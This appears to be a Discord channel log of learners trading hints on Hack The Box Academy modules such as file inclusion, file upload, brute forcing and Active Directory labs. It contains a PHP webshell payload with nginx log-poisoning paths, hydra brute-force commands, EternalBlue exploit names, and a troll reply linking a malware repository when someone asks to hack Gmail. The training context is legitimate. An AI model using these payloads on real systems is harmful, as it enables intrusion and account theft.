#modules

@cunning oak dm

Bruteforcing Usernames: Anyone else having problems with the machine? I've re-spawned it several times, every time it stops working after about a minute or so.

I have spent numerous hours and days on the Using Web Proxies - Repeating Web Requests section and cannot figure out what they want me to input for the answer for the second flag. I have completed the entire rest of this module and have a complete understanding. I just dont know what they want inputted as the answer. Can somebody help me out please?

hello

what i'm doing bad??

not starting the target and not ssh into it

Solved

i have other question

i have like 1:30 hours try in comands

like simplehttpserver

but i can't find what command is

i do manually the http server but can't find the command

https://www.npmjs.com/package/http-server

i saw this page before

and try in commands that i see but not work it

Better look at cheatsheet then

And hints also

have a bug

i can't see the hint

and the cheatsheet

idk what happend

SOLVED

thanks @hollow hinge

Hey

I hv just started with this thing

And i dont know how to connect the ovpn file

Can anyone help pls

can it be that https://academy.hackthebox.com/module/17/section/64 is bugged?
the whole module revolves around wordpress but when i go to the target i don't find wordpress

Guys can I play hack box even if I have started to learn python day ago ? Or I need to know just kali? I mean the unix itself kali

And is there a real hacking process and nothing fake created? Like Mario the story ?

I would say you can just try it 🙂
If you realize that you are not quite there with the knowledge, you can register in the hack the box academy: https://academy.hackthebox.com/dashboard

Thx bro

Is that for free?

Because I really want to become a hacker

I learn unix I learn python and will start to learn html

No but it is very good 😄

sometimes you hang here and there like me now xD
but the learning effect is very good

Nah I cannot pay cuz my card is blocked

Anyway thx

hint the wordpress isn't in that domain

what ?

subdomain?

if you are new to this watch this to know how to be come a hacker also where you can get free stuff https://www.youtube.com/watch?v=lhz0-qAQlBM

||yep||

||god damn !||

but you need to find the right domain first

well .. how ? 😄

Take a closer look at the source code of the website 😉

ah i found the url .. overthinking

anyone for a nudge on the file upload attacks skills assessment? i can't find the upload path

.

u mean of ||script.js||?

Hey, currently in Attacking Common Services/SMTP Attacks, found user m, trying to bruteforce with provided list and rockyou.txt, but nothing. Is bruteforcing is correct way to get password of found user?

yes that's the right way but did you use the full mail address?

nope that that file named ||upload.php||

ohh, got it. thanks

tried that but I can't get to read it

try with ||base64||

@copper creek Mb i was thinking on File Inclusion module

can i dm u?

sure

I have spent numerous hours and days on the Using Web Proxies - Repeating Web Requests section and cannot figure out what they want me to input for the answer for the second flag. I have completed the entire rest of this module and have a complete understanding. I just dont know what they want inputted as the answer.

@mellow nymph the flag

it starts with HTB

the flag is at / so try to cat flag.txt

noo dont paste here the flag

thats a spoiler :/

how can i get started?

hi pls delete this you can't put htb academy flag in to discord some admin or mod will remind you about this

ok sorry

it's fine , just delete the msg

to started with htb academy try this https://academy.hackthebox.com/module/details/15 or with hacking in general try this https://www.youtube.com/watch?v=lhz0-qAQlBM

Hello great guys ?,i am new here, just starting a cyber security career any help and tips pls😫 🙏 🙏 🙏 ,best guide line, pls need menthorship too thanks

my message is right on top of your

I need some help with the final host of the live engagement of shells and payloads. I assume I need to disable smth on the machine so that blue can work, but my shell keeps on crashing, forcing a restart of the whole environment. Any tips on how to make a more stable shell or a different method would be appreciated.

you dont need to do anything but run the correct exploit.

Hello, I'm new.. does anyone has the software download for the flipper zero?

I just google it, thats nice but i think we dont use it here

Never ever heard of this tool.

Maybe on there website? https://flipperzero.one

hak5 have better stuff

Some of the hak5 stuff you can build yourself tho

Im not paying 60$ for a rubber ducky

me too 🤣

This flipper zero tool seems kinda cool tho ngl

Thanks for the hint, was able to get the flag.

if you are just looking for the software i think you can download it on their github https://github.com/flipperdevices

i dunno man , i have a cheap little digistump board that i can write to with arduino software and i have literally never gotten a payload to work properly. At least the ducky actually works right?

Tru. I don’t know how good the quality is, but I like the idea and dolphins are cute

Thanks everyone

I bought some boards and 4 of the 5 were DOA. The 5th one tho works and I have used it to grab wifi passwords. Have been trying to get a keylogger to work but cant seem to get it to work so far.

I need to buy me some hardware tools

Open for recommendations

same here

i need to buy some networking equipment and a server rack

I literally just got a server for free bruh

No joke

nice

Decent specs too

i dont even want a working server or networking equipment

its just for appearance

while i use my windows laptop connected to home wifi

basically if you are trying to be a security professional

and you dont have a server rack or random pieces of networking equipment all over your house

you are doing it wrong

Im having a problem understanding how to complete the skill assessment of the Windows Fund. module. Im currently done with all the questions but I am trying to complete the other steps for better practice

I cant seem to "find" the default group that needs to be removed when adding HR to the folder Company Data it doesn't show the default group

And when I thought I did, I went to the disable inheritance step and my HR group has an enumeration error of permissions in its container

isn't the default group ||Everyone|| ?

O xD

I feel dumb now shkshkshk

gawd, the File inclusion skills assessment RCE keeps breaking

anyone around who can help with a nudge on Broken Auth Skills assessment? I'm stuck on getting the admin panel.

for the last RCE part use single quotes instead of double quotes for your payload

if you are on the ||support|| user that isn't the admin user also there are no admin panel the flag i think is in the profile page

@vital adder mind if I DM you?

sure

hey guys I'm new. I'm stuck on responder evil-winrm is throwing an error about my python path not being complete. I've uninstalled and reinstalled it a few times still no luck. I did read something that talked about going into the source code deleting a line and that worked before i went through that i was hoping someone may have some advice. I'm also getting a 502 error for Three when i use gobuster to find the s3 bucket. I'm wondering why and how can i get around it? I've tried to reset the machines and I've gone as far as to restore my kali image to an original snapshot. Any advice on these issues would be appreciated thank you.

hmm, it becomes irresponsive when i use single quote

which mudole and section?

its in starting point tier 1 i may be in the wrong chat for help if i am i apoligize

try this payload ||<?php system($_GET['cmd']); ?>||

thats the payload that i used and then with this

..//..//..//..//..//..//..//..//..//..//var/log/nginx/"hidden".log&cmd=id

i didn't use ..// but if that work i don't think that is an issue but you are using the wrong log file

let me dm you

sure

Hey. I'm in the module "shells and payloads" at "The Live Engagement" and I'm having problems with Eternal blu exploit i need to use to solve this question:
Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt

Someone did this?

if you use the right exploit you should get a rev shell and you can get the flag from there if you can't get that work there is an exploit that let you run 1 command you can use that to read the flag

I'm usign eternal blue exploits in metasploit but it isn't working. Can you give me 1 hint about the command you are talking?

that is an exploit not a command and exploit is ||ms17_010_command|| also what exploit did you use for the eternal blue

Thanks MRtom

how to activated win 11

how to hack gmail

for recovery purposes

and to get rit of the secret goverment service

hihihihihihihi

and how to protect the computer from hackers

you are your anti virus

anti virus are usesless againts hackers

this ones dont care about anti virus

Download the programs from here and run https://github.com/ytisf/theZoo

This can help you hack gmail 😱

oh thanks

i will try it to recover my gmail

to play league of legends

@fading bough here is the answer for all of your question, pls don't share this every 3 letter government agencies are looking for this

绝不会放弃你
永远不会让你失望
永远不会跑来跑去抛弃你
永远不会让你哭泣
永远不会说再见
永远不会说谎伤害你

絕不會放棄你
永遠不會讓你失望
永遠不會跑來跑去拋棄你
永遠不會讓你哭泣
永遠不會說再見
永遠不會說謊傷害你

one of the leader of anonymous need help from other to hack gmail

haha

Can’t tell if this is trolling or serious haha

the police deparment hackers made anonymous

and also they made the discord app

well my englist is petty bad

yeah

i will try read this guys to improve my english

I am vice leader of anonymous

Your english is good

English is super difficult haha

to avoid hackers you have to make you own operate system

no use UwUntu

and you own programing language

iam the owner from Arch
Written in python

Can I dm someone about Attacking Common Services Lab Easy? Found creds, but then stucked

i want to live forever

but i need help from others people

to make the machine that make you live forever

here you are right

._.

so i have to make people want to live forever

so other start to work on the project of living forever

in the future people will be able to leave forever

sure feel free to dm me if you still stuck with that

blackbear i am luffy

the real one

one piece is my life story

I've never watched one piece

xD

good for you

is a waste of time

i waste my life on the first chats room ever created

xat.com

use TempleOS that was make a custom programing language named holy C both make buy a cazy talented programer that believed god have chosen him to buil this

terry a david

a bet that no one can hack that os

One piece is hype

Wano arc is awesome so far

Also stop spamming this channel Lmfao

discord is the son of those chats rooms

thoses are the first chats rooms ever created

pls sent my the link for dowlaod the noescape.exe

no troll

terry was my teacher

but i hate to study

so i am his worst student

pls sent my the link for dowlaod the noescape.exe
no troll

is noescape a photo editing app?

no

virus

my pc cant handle more virus so i cant risk my self of getting that virus

ok

https://lmgtfy.com?q=7

well let me keep trying to learn programming

so i can get a job

after ten years of trying

i am finally usdestading it

i believe that i am haft way of learning C#

we belive

https://imgur.com/a/FtjlKGs

i am learning making app and wacthing yuotube tutorias

so to live forever before i die

i need at least 10 millios of people working it living forever

i problably have to make posters and put them on the street

..... a virus is a program

just sharing my knowledge to pay others for helping me

the serie mr robot might be helpful for beginers

i am mr robot too.....

i will try to make a bot for discord i might made 10 dollars

each month

and hopefully no one try to hack a bank

is a very bad idea

zero days hunter is a better idea

now days the police can find you without any informaction

https://tenor.com/view/hi-silly-crazy-emoji-gif-23876320

...........

i want to live forever

please keep it on topic with the channels name

stop with the nonsense

i will try to improve my writin

writing

but i need help to live a longer life

wrong server then

i need smart guys helping me

here we have some smarts gays

step aside from the keyboard and take a break

next nonsense that you paste will result in a kick

the last mod who hate me and kicked me appeared death..............

and here we go

++kick @fading bough

1.5 billio again

programmerx got the boot!

hi dpgg while you here there is a guy posting a flag about some module i did tell him to remove that but he didn't so can you remove that?

#modules message

🤣

dpgg did the 911

Can anyone give me a hint on active directory skills assessment 2. Trying to grab the flag on sql01. I have xp_cmdshell going but no access to admin user

he hacked the plane

spooner you should also try to live 10 000 years

or live forever

@fading bough (1015286483646697592) has been muted for 10h.

where can i learn to be a script kiddie

Hi

@jade pendant HI

What's up

Okay, I'm having a really weird issue. I am working on Attacking Common Services: Easy Lab. I found a user name for the ||smtp|| server. I am using hydra to try and brute-force the password using rockyou.txt on ||pop3||. Everytime I do, though, be it my attack box or the Pwnbox, hydra starts running, then after a moment, outputs a C and then freezes up. I end up having to terminate hydra with Ctrl-C. Am I the only one who has had this issue? This only seems to happen with that particular protocol. Nvm. I'm dumb. I was trying to use a protocol I didn't have an open port for.

Hello. Any help for module Secure coding 101 javascript question :

On '/Reverse' you will find an obfuscated JavaScript code, but it appears to be broken, and doesn't return the flag! Try to reverse it to understand how it should be working, and fix it to get the flag.

thanks

Is there a discord group for tryhackme ?

Okay, so for Attacking Common Services: Easy Lab, I have full credentials, but I'm not sure what direction to go to from here. Any nudges?

@vale salmon try to ||write a php shell into the xampp webroot .... there are two ways to do it !||

Ahhh, thanks

Could some one tell me what command to use to get to the root server

wish i could help dawg , i'm still stuck on custom decoder T__T

Okay, so on the Attacking Common Services: Easy Lab, I'm having trouble figuring out how to ||upload my reverse shell to C:\xampp\htdocs||. I've tried a few methods with no luck. Also, my target keeps running out of time at a rapid speed, which is odd and annoying.

are you trying to do it through ||sql or core ftp?||

I was trying with ||ftp||, but it takes forever to get a response from the server and it won't let me cd out of the directory it drops me in. Is ||sql|| a better option?

eh , different way to skin a cat

Mind if I dm?

sure

hi can anyone help me with Firewall and IDS/IPS Evasion - Medium Lab. kinda lost Solved. Thanks those that helped.

Where are you stuck at

Managed to get a list of ports, but only ||53 ||and ||445 ||is filtered. But unable to retrieve the version needed

What script did you try?

tried with sV option

DM me

Predictable Reset Token (Broken Authentication module): Someone could give me a nudge? I think I know what they want, but spent hours on it and still doesn't work. Just want to see if my approach is good or way off.

Don't advertise here, it's against our rules. Thanks.

hey! anyone can help with Information Gathering - Web edition / Active subdomain enumeration section?

thanks!

Feel free to DM me

Did you find the solution?

Hi I have problems with ATTACKING COMMON SERVICES -> Attacking Common Services - Hard module. I can login via RDP using F*** user, howver I can not login into MSSQL server. I have tried via management studio and via sqlcmd. I tried with command as "sqlcmd -S WINSRV02 -U F+++ -P '+++' -y 30 -Y 30" but no success

I can help you if you want 🙂

nobody find the flag ?

hi everybody, i'm stuck in File Upload Attack module on Limited File Uploads , on question 1 : "The above exercise contains an upload functionality that should be secure against arbitrary file uploads. Try to exploit it using one of the attacks shown in this section to read "/flag.txt"" .... i've tryed all payload but the app don't display anything .... any help??

Which flag?

The last 2 flags for secure coding 101 JavaScript.

ok, i get it

Have you been able to solve it (Bruteforcing cookies, 1st question). I decoded the cookie and changed it, but it doesn't work. Would like to know if I'm missing anything here.

I used sqsh to access the MSSQL server with this command ||sqsh -S <target IP> -U .\\f**** -P <password> -h ||

hi, I'm going through the knowledge check in getting started module but I'm stuck at exploiting getsimple cms. it seems that the server is somehow dropping all POST requests - I'm not able to edit the theme to include reverse shell php code, same thing is happening when I use metasploit with RCE exploit. just getting no response at all from the server. the file upload button is not working as well. did someone have the same problem? I've seen one person mentioning it in the forums but they got no response to this. EDIT: it seems that it's a bug when working from Parrot OS VM, it works fine with pwnbox. I'll report it in #858470491676737536

better command is ||never gonna give you up never gonna let you down||

Haha thanks bud! I think I have read the section over like four times, I have the JS unpacked and have renamed all the variables so that my code matches the examples. But i honestly just don't understand what i am supposed to do to "use" the decoder and produce the answer, Am i supposed to use the console in the browser tools or something?

Heyy all,
I am stuck at Predictable Reset Token question 1. I modified the script for the proper timezone and user but still is not working. If anyone could give me some help it's going to be great.
10x in advance

try this ||never gonna give you up never gonna let you down||

Hi guys. How much I will pay in total for the Junior Pentester path?

that info is on the path Cubes Required: 1970

Thank's. Still learning enumeration 😅

hello i am stuck at end of module USING WEB PROXIES

hello everyone, nice to meet you, i've just graduated from highschool in it science, i'd love to work one day as ethical hacker, and so i just sign up on htb academy. I'm actually a fullstack developer and i know networking pretty good but Im new into cybersecurity field, do you guys have some tips, even youtube channels or also other sites that could help me learning? Thank you very much

i need to know how to fuzz the words together and output it in a file

for example (word) would be milk - and (letters.txt) would be a-z, then output it (word_letters.txt) would be milka milkb milkc milkd...

i know ffuf can do it, but i really can't find anything today

i'd recommend hackersploit on youtube

thank you, do you raccomend more htb academy or tryhackme for a newbie? i would like to use both but idk actually 🙂

if you have some developer experience and know a good bit about networking then you already have a good foundation here check this video to see what you are missing then you are good to go https://www.youtube.com/watch?v=lhz0-qAQlBM

i would recommend tryhackme it's more beginner friendly

question 3 in the Skills Assessment?

ok, thank you very much, im gonna check that too

if you are on the Skills Assessment you also need to encode the word and i don't know if ffuf can do that (no idea didn't use that tool much) i'll recommend burp for that

any hint?

Any hints on how to get to MS01 on the Active Directory skills assessment 2? I'm running printspoofer from SQL01 but not sure how to leverage that to get over to MS01. From chat history, lazagne isn't dumping any passwords

after upload your payload check the web source code

try getting|| a system level shell on SQL01 and then run lazagne... we should be able to find creds for a user with local admin rights for MS01||

oh thanks , i'm looking in the wrong directory

hi everyone , how to bypass LFI filter ".." string ?

@little burrow you could try four dots and two slashes 😉

@west canopy yep , but not work with me 😦 , filter code look like "||<?php
if(!isset($_GET['page'])) {
include "main.php";
}
else {
$page = $_GET['page'];
if (strpos($page, "..") !== false) {
include "error.php";
}
else {
include $page . ".php";
}
}
?>||"

I tried to RCE LFI by poisoning logs at ||/var/log/nginx/access.log&cmd=id|| with user-agent = "<?php system($_GET["cmd"]); ?>" but without success , can anyone suggest me ?

I dont know ur situation but took me many tries too xD

😢

anyone else get flag4 before flag3 on linux privesc skills assessment? 😂

I am in the module "getting started". and in one of the sections I have to get a banner of the server. I connected to the ssh and used netcat
but it doesn't work
after a little bit, it says timeout

Anyone help?

someone send me a virus

On the Attacking Common Services: Medium Lab, should I use the provided users.list or a list from SecLists?

someone steal my discord by link

someone send me a link to steal my discord

Contact Discord Support if you think someone hacked your Discord.

@vale salmondo you want to invade my discord?

No, I have my own Discord account.

please

@vale salmonyou are my friend now

@shut orchid No, and I will block you if you persist

Hello everyone, I'm trying to crack a private ssh key, but I would like some guidance. I tried to ssh2john (ssh2john id_rsa > id_rsa.hash) to convert it to a hash, but I get this message "id_rsa has no password!" Any pointers on leveraging an SSH private key?

михо.rwr

@spark vector What module are you working on?

@vale salmon Footprinting Lab - Hard

@vale salmonyou are 25 years? old you are very humble😀

I'm making pizza

😝

@spark vector I can't remember for certain, but if you have the username associated with that id_rsa, you should just be able to ssh in with it using ssh -i id_rsa <username>@<target ip>

what a wonderful dialogue

jansefpyder-magdielcrhis-jamesbap-

@spark vectorcan you create a bank account for me to save money?

@vale salmon Thank you. I tried that, but I think I have the wrong username. I'll keep enumerating. I get this when I run ssh
Load key "id_rsa": invalid format
USERNAME@TARGET IP: Permission denied (publickey).

Yeah, you may have the incorrect user. It's been awhile since I did that one, sorry.

what is this server doing🤨

@vale salmon Don't sweat it. Thanks for the reply.

Sure thing!

if you got the key already for the user ||t**||, you need to assign it the right permission using ||chmod 600 id_rsa|| then you can use it to ssh the box

I tried this but I get this:
ssh -i id_rsa t**@TARGET IP
Load key "id_rsa": invalid format
t**@TARGET IP: Permission denied (publickey).

@stray grovecreate a paypal account for me

@stray grove I think it might be the username because if I use a different username I get prompted for a password. I still get the invalid format though

the username start with t, if you did an snmpwalk enum you'll find some credential. you need to enumerate snmp service first

@stray grove Did that. I got the password.

If I use ssh t@target IP, I get the invalid format and Permissions denied. But, If I use b@target IP, I get the invalid format and it prompts me for a password.

did you get the key using the credential you got from running snmpwalk after logging into the ||imap service||?

Yes

then check the key, must have some blank spaces in it...open it using sublime

@stray grove Now I have to know what sublime is 🙂

it's a text editor, if you're using pwnbox it's on the taskbar

both won't help you on that one, you need to run a full scan and enumerate ||the last port found open||

@stray grove That was it! When I copied the SSH key locally, there were white spaces all over it. Cleaned it up and now SSH is working. Thank you.

Hey yall! Can someone help me with the File Inclusion Assessment? All LFI attempts I am trying is only returning 'Invalid Input Detected'

Hey yall! Can someone help me with the File Inclusion Assessment? All LFI attempts I am trying is only returning 'Invalid Input Detected'

So I found port ||30021||, but when I use nmap on that specific port, I get ||Invalid Command: try being more creative||. When I use the ||ftp-brute script||, I find no valid accounts. I'm sure I'm missing something. Could I possibly get a nudge?

Can anyone teach me also?

try to read the ||index|| file (not by view source)

Can someone help me with the ffuf skills assessment? I’ve been at it for a month, but for some reason, my ffuf doesn’t return an important result for me.

that have ||anonymous login|| why didn't you try that first

which question?

The third fourth and fifth questions.

Eh, I didn't realize it had an ||Anon login||. Usually nmap mentions that, but it didn't this time.

oh i think you need to use a deep scan for that i use -A

You might be asking yourself: why is a pro-hacker here asking for help on a beginner module?

Ahhh, right, I'll add that to my flags for next time

You are definitely not the first. 🙂

you don't know what you don't know and that's fine

i need help with a lot of dumb stuff here and finished like 400 room on tryhackme and i'm still dumb

Even ippsec had to ask 0xdf for help while doing the fingerprint box.

I remember he said that in the video writeup he did for that box.

Yep. We all have gaps to fill in, constantly

oh sorry i didn't see this but you need spam restart it a few time if ffuf can't find it, some one show me this trick and i also have this issue the first time i do that part

Yeah, I had the same issue with that one

maybe it’s the command I’m running? Can I post it publicly or do I have to drop into a DM for that?

Or with a spoiler flag?

if it's just the command i think it's fine because you didn't find anything with that also spoiler tag

oh and for the ffuf scan try the extensions you found from the ||second question||

||ffuf -u http://test.academy.htb:PORT/ -w ~/SecLists/Discovery/Web-Content/raft-small-words.txt -e php,phps,php7||

And I do that for all three virtual hosts

I even tried matching regex for the page content mentioned in the third question, but nope.

oh you are on the wrong ||virtual hosts|| in this commmand also the page you need to find is in a ||directory|| so you need find that first and the page you need is in that

I forgot to include the recursion part, because I’m running it with recursion depth 3.

and no idea if this help but i use ||directory-list-2.3-small.txt||

Tried different wordlists, and I used that one.

I do find that directory. Maybe I need to not use recursive mode once I find it?

maybe not sure but try that

but maybe the reset trick works.

What do I do? Send a bunch of RST packets to the host? That won’t help much.

try this first if you ffuf still can't find it shoot me a dm i'll help you troubleshoot

I’ll try later. Thanks for the advice.

i just try your command the ||-e|| is not working for me for some reason if i test it individually like ||/FUZZ.php69|| then it work also i have to do the reset thing

||I think I have to use dots: .php,.phps,.php7||

just try that's also is not working for me

https://cdn.discordapp.com/attachments/747480907426037881/1015786189111967864/unknown.png

https://cdn.discordapp.com/attachments/747480907426037881/1015786189111967864/unknown.png

Hey.. Thanks! I have access to the admin portal and have now been stuck on how to view the root dir. I can view etc/passwd, etc..

For Attacking Common Services: Hard Lab, should I be using the pws.list provided or rockyou, or something different? Nvm

Okay, I'm stuck. I have credentials for ||fiona|| and can ||RDP|| in with her, but I can't figure out how to grab ||John's|| password (or Admin Credentials)

can i dm you about easy real quick

Sure

I've been working on the medium and hard labs at the same time as you, and I'm finally in a place to help! So, now that you have ||fiona's credentials||, you can ||RDP|| as that user. From there, you don't need to get ||John's credentials||, instead take a look at ||sqlcmd|| and enumerate from there.

Ah-hah! Thanks!

Mind if I DM real quick?

Sure

why do I have access only to the academy channels ?

Dm if you need help with ffuf module

Good morning everyone!

Has anyone done the Footprinting Lab and found the creds without the hint?

I was wondering how to get the creds without the hint.

Which lab level?

Oooops sorry the Easy. The hint showed the username and password, but I would like to know how they got that.

Yup… haven’t tried to find the creds to be honest

It is though for ssh

No worries, moved on to the Medium lab, but if anyone wants to share insight on how to do that lab withoug the Hint, please do!!

Feel free to dm me if you need help

On the medium and hard labs

Awesome thanks!

I'm stuck on this one too. ||I've done a ton of enumerating in the different directories|| ||(HTB hint says the other flag is in a different directory) ||and I just can't anything that looks like a flag.

Are you still stuck on this?

Can anyone give me advice on how to crack the Techsupport folder on a NFS share. (Footprinting/Lab-Medium)

Hey, need help with Attacking Common Services Medium Lab. Found a username, but bruteforcing make no results. Can someone give a hint? Thanks

Which section?

iam sure it must be "AV"

If you found a username, surely you found a note, right?

You don't have to crack the NFS drive.
You can simply mount the drive and then access the folder.

yeah, but permission denied to download or read this file

DM

Hey wanna die

@acoustic owl angry ribbet

<@&817153850845823057>

We got spammer

in the house

hey o mods

we got spammer

and a alt account

THERES A ALT!

i knew it

MODS BAN THE ALT

CAN I HAVE MOD PLS

Can I DM someone about Attacking Common Services Hard Lab?

Sure, go ahead

Hi, I am stuck on the Stack-Based OVerflow Linux x86 Skill Assignment. I got a working shellcode with read_file exploit but it doesn't work. Any hint?

i have trouble with target server in Skills Assessment - File Inclusion , It only works for about a minute and it can't load 😦

https://academy.hackthebox.com/module/23/section/513

I can help u, dm me

I'm having a problem with Hacking Wordpress - Skills Assesment can somebody help me?

||So on Attacking Common Services: Hard, I am beating my head against the wall. SQL is not my strong suite. I've found the linked server and even found the testadmin, but I can't impersonate it and can't otherwise figure what to do from here. This lab is driving me nuts.||

don't nuts and if you still have issue with that feel free to dm me

Hello friends

need some help, dunno where to find the cleartext creds for the ||tpetty|| user in the AD enum and attackse module skill assessment part 1

oh wait

might have an idea

oh got it

:D

can I DM you?

sure

Hello! I must be over thinking things. For Attacking Common Services Easy, I've found an ||email account||, but can't seem to figure out the password. Am I barking up the wrong tree? Just looking for a pointer to get started as I've tried looking at the ||ftp, rdp, and sql|| services but no luck.

use you use hydra to get the password but remember to use the ||mail address|| for the username

yay 🥳

Congrats 🎉

reeee im tryna speedrun AD enum and atks

on day 4 rn tryna get that last section

skill assessment II

i got like 7 module left on the pentest path but i procrastinate so much that i finished the bug bounty path first

I tried that. None of the services came back with anything. I'm using the pws.list from the resources. Should I expand?

use ||rockyou|| also try with the ||smtp||

Hi would anyone be able to help me with the Login Brute Forcing: Skills Assessment - Service Login Section I have found the user :||harry|| a have attempted to brute force the login multiple times and tried using the forums tips and still no luck?

generate a wordlist for that user and filter the password that meet the requirements

😑 finally. I knew there must be a fairly obvious thing I was missing. I'd tried that, but not with that particular combination of service, and lists.

Thank you ❤️

Thanks for the quick reply, I have done that with username anarchy and cupp. the options in cupp I would input is Firstname: ||Harry||, Special Chars✅ ,Leet Mode☑️ and then would use the commands 1. sed -ri '/^.{,7}$/d' <file> 2. sed -ri '/[0-9]+/!d' <file> 3. sed -ri '/[!-/:-@[-`{-~]+/!d' <file>

the regrexes here may be slightly off as I had to hand type them from my vm

i have no idea on how to use sed but it look right but for my filter command i filter from ||8 not 7 character|| and for cupp part you are almost right just missing one thing

i can't remember but i think that is the next to to firstname

Surname?

yep that one

so use ||Potter|| I have tried it before but ill give it one more run and get back to you

also does case matter?

in cupp

i think so but you are using the right one

So I am doing the Nibble box/module, and my VPN keeps disconnecting, it doesnt say its disconnected but I have a 100% packet loss, I have restarted the VPN, my laptop and everything else I could think of. Anyone have any advice? Thanks!

are your pwnbox on?

I am using the VPN and using a personal machine

having both pwnbox and your vpn on is usually is cause of your issue but if you pwnbox isn't on then i have no idea try asking this in #613049811481919508

Alright will do, thanks!

hey unfortunatley still no luck

even without filtering just in case my regrex is messed up and accidently getting rid of the correct passwd

i just try your sed filter command and it's working fine also are you brute forcing ||ssh||?

yes just in case im stupid I will type out my cmd here

hydra -L username-anarchy/username -p||harry.txt|| -u -f ssh://IP:PORT -t 4

yep that's the right command

Huh i dont get what the issue is and when you tested cupp it was the same as I specified?

yep for the last Y/N in cupp i use Y for the last ||3||

shoot me a dm i'll help you troubleshoot

sure let me try using Y for the last ||3|| and then I will let you know since I was only using 2 before

Hi all.
I am stuck on the last question of SQLi before the skills assessment.
"Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host."

So after getting the shell I use the command ls -la and saw listed directories and files and saw that vendor was the only directory listed. I used the command again ls -la vendor and only 2 directories where listed and .htaccess.

I have searched both these directories and "cat" the .htaccess file however no mention of the second and final flag. Can anyone give me a nudge in the right direction, i've been on this question for a couple of days now and just want to move on.
Thanks

@carmine lark DM me 🙂

Going through web proxies and trying to figure out the url encoding / decoding segment, seems like it should be really straight forward, but I'm just not getting a meaningful flag

Look like I do a base64 decode initially due to the = at the end, the next few iterations look like they'd potentially be more base 64 (still have = at the end), but I end up with a string that doesn't seem to have any meaning, have tried all different combinations and looked at the hint and still not really getting anything reasonable

Nevermind, just need to go one more iteration deep apparently

Helloo! Can i DM someone to help me with the last question of DNS on Footprint Module? What is the FQDN of the host where the last octet ends with "x.x.x.203"? I can't figure it out. EDIT: Solved!

@frail garden What have you done to try to answer this question?

You have to find all the zones.

@spark vector I tried to query the zone with dig axfr. Also bruteforce subdomains

@acoustic owl i believe i have found all the zones but no luck finding the host with the .203 octet

@frail garden focus on the keywords.

Hello, I require assistance on the 'Getting started' module. I am currently busy with "Pentesting basics/Public exploits".

I have tried to scan the given target with nmap, but it says the host seems down. I can search the ip in google and it gives me the website. What else do I have to do in order to find the running services?

@short brook try navigating ||to the target:port in your browser with http protocol :)||

With Docker targets, typically nmap scans aren't necessary as there is just a single port open

and you can tell its a docker target when it spawns if it has a long port number after it

for example 10.129.7.40:30385

Ok so how do I find the running services on the website?

look around

it will literally jump out in front of you

when you access the website 😉

maybe there is a way we can|| target the wordpress plugin being used...?||

Hello, I'm currently doing web request module and For the last time I couldn't find server.php file in browser network, it wasn't there.. What might cause that? Am I doing something wrong? *I'm using HTB machine, not mine...

Could I have help with the LFI skills assesment? I was able to get to an admin panel, but I am having trouble with RCE

Anyone around to help with:
Broken Authentication - Bruteforcing Cookies question 1 ???

me too

Were you able to get to the admin panel?

I have the cookie decoded and re-encoded, but it seems like there is some guess-work involved with the role???

every attempt to poison the log file fails

php wrap filter

@little burrow I'm not sure if this will help but I was able to find a log file at || ../../../../../../../../var/log/nginx/access.log ||

Going to try out a log poisoning attack

me too 😦

but the access log doesn't log my user-agent

yeah I think I might be having the same issue

very tough skills assesment haha

@raven cairn i might be able to help

This guessing game is killing me....

@twilit cipher i got you dawg

If someone has a moment and has done the Pivoting, Tunneling, and Port Forwarding module, could you shoot me a DM? I have some questions about the Meterpreter Tunneling & Port Forwarding section.

Wsg

hit me up boo

Hey Yall! Can someone please help me out with File Inclusion assessment? I haver gotten as far as accessing both access/error log in admin panel, but nothing Im doing seems to be working including poisoning User-Agent and using wrappers

Hey jarednexgent! Would you be able to help me with LFI assessment as well?

Hi. Sorta new to HTB but got back into it after friends I reconnected with helped me get back into trying to learn via HTB Academy. Is there anyone who can help me understand SQL Injection Fundamental - Subverting Query Logic? I'm trying to figure out logging in as 'tom' instead of 'admin'. Not really looking for spoilers since I try to avoid cheating when I learn.

YES

Just got it now. I feel dumb thanks to my overthinking. XD

Hey anyone around to help with the file upload skill assessment? I am stuck trying to get a webshell and I keep getting: 'The image "URL" cannot be displayed because it contains errors.'

i think you need to use a different extension

I'm not so sure, I've tried every extension I can find: ||'.pht' '.phar' '.phtm ' '.phps' '.php' '.php2' '.php3' '.php4' '.php5' '.php6' '.shtml' '.php7' '.php8' '.phpt' '.pgif' '.phtml' '.shtml' '.htaccess' '.inc' '.pHp' '.pHar'||

hint you need to use ||double extension|| also ||magic number||

Yep using both of those already. ||I'm through the blacklist, whitelist, and content filters but my php code will not run||

did you try ||(extensions).jpg|| with the ||jpg magic number||?

Is everyone using the normal target server ? , I turned on target server and it seems to work only for a few seconds and then the website can't be loaded 😦

need help with Active Subdomain Enumeration

Who’s very good at pen testing?

good morning i'm having some issues with the last question of the login brute forcing module... i used this command in order to brute force the password of the g.potter user but it's not retrieving any resaults and i don't get what i am missing.. hydra -l username -P rockyou-30.txt -u -f ftp://127.0.0.1 -t 4

hello

Hi, looking for help for ATTACKING COMMON SERVICES - SQL section. i got the mssqlsvc password but when i tried to login using sqsh, its saying login failed mybad i am in

Why is there no directory

have you tried the ls command ,just saying

Good Morning! Can I get an assist with the Footprinting Lab - Medium please? I have retrieved the sql creds, and I'm struggling with what to do.

id_rsa, if it exists, will be in the .ssh folder. Probably.

hi

hi

anyone

i recommend the tool suBF.sh for this that tool will brute force the by using the su command locally and it was make by the same guy that make linpeas so you can find it on his github

Hi person

do you know hack

I'm not to good

gtg

what do you hack

Hello, I'm not sure what your question is but keep in mind that we do have #rules
Also this isn't a discord to hire hackers.

====
Hello guys, I would like to find all files contain string "password", but I want to exclude not to find in specifi path such as C:\Windows. How I can do that?

I did try

findstr /SIM /C:"password" | findstr /v /i /C"\\Windows"

But it does not work. Any suggestions?

@loud bone yes I did

oops i don't what you can do to that , have you like tried to put a / at the beginning

hi, anyone knows if in HTB is there any way to make a search filtered by subject like web, ad or something like this...!!!

@loud bone I think there’s no ssh directory

Hi, for ATTACKING COMMON SERVICES - DNS how do i get the bruteforce to work?

With subbrute

Can anyone give me a hint on Broken Authentication -> Bruteforcing Cookies? I'm not able to decode the rememberme token

Use Decodify

hey! yes 🙂

it gives me the same code as cyberchef.org gives

I don't know what to do with this wierd code

DM

DM me if you still need help

AD Enumeration & Attacks - Skills Assessment Part II
